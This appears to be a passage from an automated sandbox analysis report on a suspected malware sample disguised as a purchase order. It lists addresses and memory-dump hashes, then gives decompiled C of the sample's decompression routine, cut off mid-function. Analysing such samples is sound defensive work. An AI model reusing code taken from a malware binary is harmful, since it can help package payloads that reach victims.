                      0x004068aa
                      0x00000000
                      0x004068aa
                      0x00406626
                      0x00406629
                      0x00000000
                      0x00000000
                      0x0040662f
                      0x00406633
                      0x00406636
                      0x00406636
                      0x00406636
                      0x00000000
                      0x00406636
                      0x004064b4
                      0x004064b6
                      0x004064b8
                      0x004064ba
                      0x004064bd
                      0x004064be
                      0x004064c0
                      0x004064c2
                      0x004064c5
                      0x004064c8
                      0x004064de
                      0x004064e3
                      0x0040651b
                      0x0040651b
                      0x0040651f
                      0x0040654b
                      0x0040654d
                      0x00406554
                      0x00406557
                      0x0040655a
                      0x0040655a
                      0x0040655f
                      0x0040655f
                      0x00406561
                      0x00406564
                      0x0040656b
                      0x0040656e
                      0x0040659b
                      0x0040659b
                      0x0040659e
                      0x004065a1
                      0x00406615
                      0x00406615
                      0x00406615
                      0x00000000
                      0x00406615
                      0x004065a3
                      0x004065a9
                      0x004065ac
                      0x004065af
                      0x004065b2
                      0x004065b5
                      0x004065b8
                      0x004065bb
                      0x004065be
                      0x004065c1
                      0x004065c4
                      0x004065dd
                      0x004065df
                      0x004065e2
                      0x004065e3
                      0x004065e6
                      0x004065e8
                      0x004065eb
                      0x004065ed
                      0x004065ef
                      0x004065f2
                      0x004065f4
                      0x004065f7
                      0x004065fb
                      0x004065fd
                      0x004065fd
                      0x004065fe
                      0x00406601
                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000
                      0x004068e7
                      0x00406734
                      0x004066bb
                      0x004066b8
                      0x00000000
                      0x004062ef

                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                      • Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
                      • Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                      • Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E00406409() {
                      				unsigned short _t531;
                      				signed int _t532;
                      				void _t533;
                      				signed int _t534;
                      				signed int _t535;
                      				signed int _t565;
                      				signed int _t568;
                      				signed int _t589;
                      				signed int* _t606;
                      				void* _t613;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					if( *(_t613 - 0x40) != 0) {
                      						 *(_t613 - 0x84) = 0xb;
                      						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                      						goto L132;
                      					} else {
                      						__eax =  *(__ebp - 0x28);
                      						L88:
                      						 *(__ebp - 0x2c) = __eax;
                      						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      						L89:
                      						__eax =  *(__ebp - 4);
                      						 *(__ebp - 0x80) = 0x15;
                      						__eax =  *(__ebp - 4) + 0xa68;
                      						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                      						L69:
                      						 *(__ebp - 0x84) = 0x12;
                      						while(1) {
                      							L132:
                      							 *(_t613 - 0x54) = _t606;
                      							while(1) {
                      								L133:
                      								_t531 =  *_t606;
                      								_t589 = _t531 & 0x0000ffff;
                      								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                      								if( *(_t613 - 0xc) >= _t565) {
                      									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                      									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                      									 *(_t613 - 0x40) = 1;
                      									_t532 = _t531 - (_t531 >> 5);
                      									 *_t606 = _t532;
                      								} else {
                      									 *(_t613 - 0x10) = _t565;
                      									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                      								}
                      								if( *(_t613 - 0x10) >= 0x1000000) {
                      									goto L139;
                      								}
                      								L137:
                      								if( *(_t613 - 0x6c) == 0) {
                      									 *(_t613 - 0x88) = 5;
                      									L170:
                      									_t568 = 0x22;
                      									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                      									_t535 = 0;
                      									L172:
                      									return _t535;
                      								}
                      								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                      								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                      								L139:
                      								_t533 =  *(_t613 - 0x84);
                      								while(1) {
                      									 *(_t613 - 0x88) = _t533;
                      									while(1) {
                      										L1:
                      										_t534 =  *(_t613 - 0x88);
                      										if(_t534 > 0x1c) {
                      											break;
                      										}
                      										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                      											case 0:
                      												if( *(_t613 - 0x6c) == 0) {
                      													goto L170;
                      												}
                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      												_t534 =  *( *(_t613 - 0x70));
                      												if(_t534 > 0xe1) {
                      													goto L171;
                      												}
                      												_t538 = _t534 & 0x000000ff;
                      												_push(0x2d);
                      												asm("cdq");
                      												_pop(_t570);
                      												_push(9);
                      												_pop(_t571);
                      												_t609 = _t538 / _t570;
                      												_t540 = _t538 % _t570 & 0x000000ff;
                      												asm("cdq");
                      												_t604 = _t540 % _t571 & 0x000000ff;
                      												 *(_t613 - 0x3c) = _t604;
                      												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                      												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                      												_t612 = (0x300 << _t604 + _t609) + 0x736;
                      												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                      													L10:
                      													if(_t612 == 0) {
                      														L12:
                      														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                      														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      														goto L15;
                      													} else {
                      														goto L11;
                      													}
                      													do {
                      														L11:
                      														_t612 = _t612 - 1;
                      														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                      													} while (_t612 != 0);
                      													goto L12;
                      												}
                      												if( *(_t613 - 4) != 0) {
                      													GlobalFree( *(_t613 - 4));
                      												}
                      												_t534 = GlobalAlloc(0x40, 0x600); // executed
                      												 *(_t613 - 4) = _t534;
                      												if(_t534 == 0) {
                      													goto L171;
                      												} else {
                      													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                      													goto L10;
                      												}
                      											case 1:
                      												L13:
                      												__eflags =  *(_t613 - 0x6c);
                      												if( *(_t613 - 0x6c) == 0) {
                      													 *(_t613 - 0x88) = 1;
                      													goto L170;
                      												}
                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                      												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      												_t45 = _t613 - 0x48;
                      												 *_t45 =  *(_t613 - 0x48) + 1;
                      												__eflags =  *_t45;
                      												L15:
                      												if( *(_t613 - 0x48) < 4) {
                      													goto L13;
                      												}
                      												_t546 =  *(_t613 - 0x40);
                      												if(_t546 ==  *(_t613 - 0x74)) {
                      													L20:
                      													 *(_t613 - 0x48) = 5;
                      													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                      													goto L23;
                      												}
                      												 *(_t613 - 0x74) = _t546;
                      												if( *(_t613 - 8) != 0) {
                      													GlobalFree( *(_t613 - 8));
                      												}
                      												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                      												 *(_t613 - 8) = _t534;
                      												if(_t534 == 0) {
                      													goto L171;
                      												} else {
                      													goto L20;
                      												}
                      											case 2:
                      												L24:
                      												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                      												 *(_t613 - 0x84) = 6;
                      												 *(_t613 - 0x4c) = _t553;
                      												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                      												L132:
                      												 *(_t613 - 0x54) = _t606;
                      												goto L133;
                      											case 3:
                      												L21:
                      												__eflags =  *(_t613 - 0x6c);
                      												if( *(_t613 - 0x6c) == 0) {
                      													 *(_t613 - 0x88) = 3;
                      													goto L170;
                      												}
                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      												_t67 = _t613 - 0x70;
                      												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                      												__eflags =  *_t67;
                      												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                      												L23:
                      												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                      												if( *(_t613 - 0x48) != 0) {
                      													goto L21;
                      												}
                      												goto L24;
                      											case 4:
                      												L133:
                      												_t531 =  *_t606;
                      												_t589 = _t531 & 0x0000ffff;
                      												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                      												if( *(_t613 - 0xc) >= _t565) {
                      													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                      													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                      													 *(_t613 - 0x40) = 1;
                      													_t532 = _t531 - (_t531 >> 5);
                      													 *_t606 = _t532;
                      												} else {
                      													 *(_t613 - 0x10) = _t565;
                      													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                      												}
                      												if( *(_t613 - 0x10) >= 0x1000000) {
                      													goto L139;
                      												}
                      											case 5:
                      												goto L137;
                      											case 6:
                      												__edx = 0;
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__eax =  *(__ebp - 4);
                      													__ecx =  *(__ebp - 0x38);
                      													 *(__ebp - 0x34) = 1;
                      													 *(__ebp - 0x84) = 7;
                      													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                      													while(1) {
                      														L132:
                      														 *(_t613 - 0x54) = _t606;
                      														goto L133;
                      													}
                      												}
                      												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      												__esi =  *(__ebp - 0x60);
                      												__cl = 8;
                      												__cl = 8 -  *(__ebp - 0x3c);
                      												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      												__ecx =  *(__ebp - 0x3c);
                      												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      												__ecx =  *(__ebp - 4);
                      												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      												__eflags =  *(__ebp - 0x38) - 4;
                      												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      												if( *(__ebp - 0x38) >= 4) {
                      													__eflags =  *(__ebp - 0x38) - 0xa;
                      													if( *(__ebp - 0x38) >= 0xa) {
                      														_t98 = __ebp - 0x38;
                      														 *_t98 =  *(__ebp - 0x38) - 6;
                      														__eflags =  *_t98;
                      													} else {
                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      													}
                      												} else {
                      													 *(__ebp - 0x38) = 0;
                      												}
                      												__eflags =  *(__ebp - 0x34) - __edx;
                      												if( *(__ebp - 0x34) == __edx) {
                      													__ebx = 0;
                      													__ebx = 1;
                      													goto L61;
                      												} else {
                      													__eax =  *(__ebp - 0x14);
                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      													__eflags = __eax -  *(__ebp - 0x74);
                      													if(__eax >=  *(__ebp - 0x74)) {
                      														__eax = __eax +  *(__ebp - 0x74);
                      														__eflags = __eax;
                      													}
                      													__ecx =  *(__ebp - 8);
                      													__ebx = 0;
                      													__ebx = 1;
                      													__al =  *((intOrPtr*)(__eax + __ecx));
                      													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      													goto L41;
                      												}
                      											case 7:
                      												__eflags =  *(__ebp - 0x40) - 1;
                      												if( *(__ebp - 0x40) != 1) {
                      													__eax =  *(__ebp - 0x24);
                      													 *(__ebp - 0x80) = 0x16;
                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      													__eax =  *(__ebp - 0x28);
                      													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      													__eax =  *(__ebp - 0x2c);
                      													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      													__eax = 0;
                      													__eflags =  *(__ebp - 0x38) - 7;
                      													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      													__al = __al & 0x000000fd;
                      													__eax = (__eflags >= 0) - 1 + 0xa;
                      													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                      													__eax =  *(__ebp - 4);
                      													__eax =  *(__ebp - 4) + 0x664;
                      													__eflags = __eax;
                      													 *(__ebp - 0x58) = __eax;
                      													goto L69;
                      												}
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x84) = 8;
                      												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                      												while(1) {
                      													L132:
                      													 *(_t613 - 0x54) = _t606;
                      													goto L133;
                      												}
                      											case 8:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__eax =  *(__ebp - 4);
                      													__ecx =  *(__ebp - 0x38);
                      													 *(__ebp - 0x84) = 0xa;
                      													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                      												} else {
                      													__eax =  *(__ebp - 0x38);
                      													__ecx =  *(__ebp - 4);
                      													__eax =  *(__ebp - 0x38) + 0xf;
                      													 *(__ebp - 0x84) = 9;
                      													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                      												}
                      												while(1) {
                      													L132:
                      													 *(_t613 - 0x54) = _t606;
                      													goto L133;
                      												}
                      											case 9:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													goto L89;
                      												}
                      												__eflags =  *(__ebp - 0x60);
                      												if( *(__ebp - 0x60) == 0) {
                      													goto L171;
                      												}
                      												__eax = 0;
                      												__eflags =  *(__ebp - 0x38) - 7;
                      												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                      												__eflags = _t259;
                      												0 | _t259 = _t259 + _t259 + 9;
                      												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                      												goto L76;
                      											case 0xa:
                      												goto L0;
                      											case 0xb:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__ecx =  *(__ebp - 0x24);
                      													__eax =  *(__ebp - 0x20);
                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      												} else {
                      													__eax =  *(__ebp - 0x24);
                      												}
                      												__ecx =  *(__ebp - 0x28);
                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      												goto L88;
                      											case 0xc:
                      												L99:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xc;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t334 = __ebp - 0x70;
                      												 *_t334 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t334;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												__eax =  *(__ebp - 0x2c);
                      												goto L101;
                      											case 0xd:
                      												L37:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xd;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t122 = __ebp - 0x70;
                      												 *_t122 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t122;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												L39:
                      												__eax =  *(__ebp - 0x40);
                      												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      													goto L48;
                      												}
                      												__eflags = __ebx - 0x100;
                      												if(__ebx >= 0x100) {
                      													goto L54;
                      												}
                      												L41:
                      												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      												__ecx =  *(__ebp - 0x58);
                      												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      												 *(__ebp - 0x48) = __eax;
                      												__eax = __eax + 1;
                      												__eax = __eax << 8;
                      												__eax = __eax + __ebx;
                      												__esi =  *(__ebp - 0x58) + __eax * 2;
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      												__ax =  *__esi;
                      												 *(__ebp - 0x54) = __esi;
                      												__edx = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													 *(__ebp - 0x40) = 1;
                      													__cx = __ax >> 5;
                      													__eflags = __eax;
                      													__ebx = __ebx + __ebx + 1;
                      													 *__esi = __ax;
                      												} else {
                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edx;
                      													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      													__ebx = __ebx + __ebx;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													goto L39;
                      												} else {
                      													goto L37;
                      												}
                      											case 0xe:
                      												L46:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xe;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t156 = __ebp - 0x70;
                      												 *_t156 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t156;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												while(1) {
                      													L48:
                      													__eflags = __ebx - 0x100;
                      													if(__ebx >= 0x100) {
                      														break;
                      													}
                      													__eax =  *(__ebp - 0x58);
                      													__edx = __ebx + __ebx;
                      													__ecx =  *(__ebp - 0x10);
                      													__esi = __edx + __eax;
                      													__ecx =  *(__ebp - 0x10) >> 0xb;
                      													__ax =  *__esi;
                      													 *(__ebp - 0x54) = __esi;
                      													__edi = __ax & 0x0000ffff;
                      													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      													__eflags =  *(__ebp - 0xc) - __ecx;
                      													if( *(__ebp - 0xc) >= __ecx) {
                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      														__cx = __ax;
                      														_t170 = __edx + 1; // 0x1
                      														__ebx = _t170;
                      														__cx = __ax >> 5;
                      														__eflags = __eax;
                      														 *__esi = __ax;
                      													} else {
                      														 *(__ebp - 0x10) = __ecx;
                      														0x800 = 0x800 - __edi;
                      														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      														__ebx = __ebx + __ebx;
                      														 *__esi = __cx;
                      													}
                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                      													 *(__ebp - 0x44) = __ebx;
                      													if( *(__ebp - 0x10) >= 0x1000000) {
                      														continue;
                      													} else {
                      														goto L46;
                      													}
                      												}
                      												L54:
                      												_t173 = __ebp - 0x34;
                      												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                      												__eflags =  *_t173;
                      												goto L55;
                      											case 0xf:
                      												L58:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0xf;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t203 = __ebp - 0x70;
                      												 *_t203 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t203;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												L60:
                      												__eflags = __ebx - 0x100;
                      												if(__ebx >= 0x100) {
                      													L55:
                      													__al =  *(__ebp - 0x44);
                      													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                      													goto L56;
                      												}
                      												L61:
                      												__eax =  *(__ebp - 0x58);
                      												__edx = __ebx + __ebx;
                      												__ecx =  *(__ebp - 0x10);
                      												__esi = __edx + __eax;
                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                      												__ax =  *__esi;
                      												 *(__ebp - 0x54) = __esi;
                      												__edi = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													_t217 = __edx + 1; // 0x1
                      													__ebx = _t217;
                      													__cx = __ax >> 5;
                      													__eflags = __eax;
                      													 *__esi = __ax;
                      												} else {
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edi;
                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      													__ebx = __ebx + __ebx;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													goto L60;
                      												} else {
                      													goto L58;
                      												}
                      											case 0x10:
                      												L109:
                      												__eflags =  *(__ebp - 0x6c);
                      												if( *(__ebp - 0x6c) == 0) {
                      													 *(__ebp - 0x88) = 0x10;
                      													goto L170;
                      												}
                      												__ecx =  *(__ebp - 0x70);
                      												__eax =  *(__ebp - 0xc);
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												_t365 = __ebp - 0x70;
                      												 *_t365 =  *(__ebp - 0x70) + 1;
                      												__eflags =  *_t365;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      												goto L111;
                      											case 0x11:
                      												goto L69;
                      											case 0x12:
                      												__eflags =  *(__ebp - 0x40);
                      												if( *(__ebp - 0x40) != 0) {
                      													__eax =  *(__ebp - 0x58);
